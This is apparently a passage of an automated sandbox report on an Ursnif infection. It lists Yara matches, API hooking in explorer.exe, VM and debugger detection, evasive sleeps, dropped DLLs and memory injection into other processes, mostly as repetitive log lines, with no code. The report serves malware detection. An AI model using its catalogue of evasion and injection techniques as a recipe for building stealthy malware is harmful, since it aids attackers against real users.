Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\5ycfw01g\5ycfw01g.dll			Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif

Source: Yara match	File source: 00000000.00000003.683789524.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000003.843504876.000001A778130000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.683743665.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000003.852406498.0000000003190000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.914135566.000001B4FAD45000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.886882994.00000000009B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.857674347.00000284AA705000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.779793362.0000000002F7C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.683848326.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.683682102.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.856702650.0000000000FE5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.914614455.0000027D4F835000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.683714735.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.835757240.00000000009E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.683763828.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.856122162.00000284AA500000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.683813516.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.826681690.000001D7C46A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.683833344.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 3424, type: MEMORY
Source: Yara match	File source: Process Memory Space: control.exe PID: 6752, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 6536, type: MEMORY
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 3656, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6476, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 5528, type: MEMORY

Hooks registry keys query functions (used to hide registry keys)

Source: explorer.exe

IAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW

Modifies the export address table of user mode modules (user mode EAT hooks)

Source: explorer.exe

IAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FFABB03521C

Modifies the import address table of user mode modules (user mode IAT hooks)

Source: explorer.exe

EAT of a user mode module has changed: module: user32.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FFABB035200

Modifies the prolog of user mode functions (user mode inline hooks)

Source: explorer.exe

User mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Source: C:\Windows\System32\loaddll32.exe

0_2_1007F8B0

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\Windows\System32\loaddll32.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Stores large binary data to the registry

Source: C:\Windows\SysWOW64\WerFault.exe

Key value created or modified: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Immersive\production\Token\{67082621-8D18-4333-9C64-10DE93676363} DeviceTicket

Source: C:\Windows\System32\loaddll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\control.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Contains capabilities to detect virtual machines

Source: C:\Windows\System32\control.exe

File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Contains long sleeps (>= 3 min)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2918			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6023			Jump to behavior

Found dropped PE file which has not been started or loaded

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\xxfxarla\xxfxarla.dll			Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\5ycfw01g\5ycfw01g.dll			Jump to dropped file

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\loaddll32.exe TID: 5768	Thread sleep time: -120000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4540	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 3984	Thread sleep time: -3005658240s >= -30000s

Source: C:\Windows\System32\loaddll32.exe

0_2_026742B4

Source: explorer.exe, 0000001E.00000000.845693357.000000000A60E000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000001E.00000000.840037908.00000000058C0000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000021.00000002.913809482.0000027D4F440000.00000002.00000001.sdmp, WerFault.exe, 00000025.00000002.883131982.0000000004B50000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000027.00000002.913091879.000001B4FA9B0000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: RuntimeBroker.exe, 00000021.00000002.909095475.0000027D4C640000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000001E.00000000.845693357.000000000A60E000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000001E.00000003.905601233.000000000DC82000.00000004.00000040.sdmp	Binary or memory string: gencounter Microsoft Hyper-V Gene Kernel
Source: explorer.exe, 0000001E.00000003.905601233.000000000DC82000.00000004.00000040.sdmp	Binary or memory string: vmgid Microsoft Hyper-V Gues Kernel
Source: explorer.exe, 0000001E.00000003.905601233.000000000DC82000.00000004.00000040.sdmp	Binary or memory string: bttflt Microsoft Hyper-V VHDP Kernel
Source: WerFault.exe, 00000025.00000003.879906098.0000000004AD2000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 0000001E.00000003.905601233.000000000DC82000.00000004.00000040.sdmp	Binary or memory string: vpci Microsoft Hyper-V Virt Kernel
Source: explorer.exe, 0000001E.00000000.838462284.0000000004710000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
Source: WerFault.exe, 00000025.00000003.879906098.0000000004AD2000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAWk
Source: explorer.exe, 0000001E.00000000.845870000.000000000A716000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
Source: explorer.exe, 0000001E.00000000.840037908.00000000058C0000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000021.00000002.913809482.0000027D4F440000.00000002.00000001.sdmp, WerFault.exe, 00000025.00000002.883131982.0000000004B50000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000027.00000002.913091879.000001B4FA9B0000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: RuntimeBroker.exe, 00000021.00000002.912423816.0000027D4E762000.00000004.00000001.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&1EC51BF7&0&000000
Source: explorer.exe, 0000001E.00000000.840037908.00000000058C0000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000021.00000002.913809482.0000027D4F440000.00000002.00000001.sdmp, WerFault.exe, 00000025.00000002.883131982.0000000004B50000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000027.00000002.913091879.000001B4FA9B0000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 0000001E.00000003.905601233.000000000DC82000.00000004.00000040.sdmp	Binary or memory string: storflt Microsoft Hyper-V Stor Kernel
Source: explorer.exe, 0000001E.00000000.845951984.000000000A784000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
Source: explorer.exe, 0000001E.00000003.905640815.000000000DC69000.00000004.00000040.sdmp	Binary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
Source: explorer.exe, 0000001E.00000000.840037908.00000000058C0000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000021.00000002.913809482.0000027D4F440000.00000002.00000001.sdmp, WerFault.exe, 00000025.00000002.883131982.0000000004B50000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000027.00000002.913091879.000001B4FA9B0000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Windows\System32\loaddll32.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Checks if the current process is being debugged

Source: C:\Windows\System32\loaddll32.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process queried: DebugPort			Jump to behavior

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_011115D2 GetLastError,NtClose,LdrInitializeThunk,

0_2_011115D2

Enables debug privileges

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion:

Allocates memory in foreign processes

Source: C:\Windows\System32\loaddll32.exe	Memory allocated: C:\Windows\System32\control.exe base: 1050000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\explorer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 27D4F3D0000 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1B4FAC50000 protect: page execute and read and write
Source: C:\Windows\System32\control.exe	Memory allocated: C:\Windows\System32\rundll32.exe base: 284AA390000 protect: page execute and read and write

Changes memory attributes in foreign processes to executable or writable

Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFABD4F1580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFABD4F1580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFABD4F1580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\System32\control.exe	Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\System32\control.exe	Memory protected: unknown base: 7FFABD4F1580 protect: page execute read
Source: C:\Windows\System32\control.exe	Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write

Compiles code for process injection (via .Net compiler)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

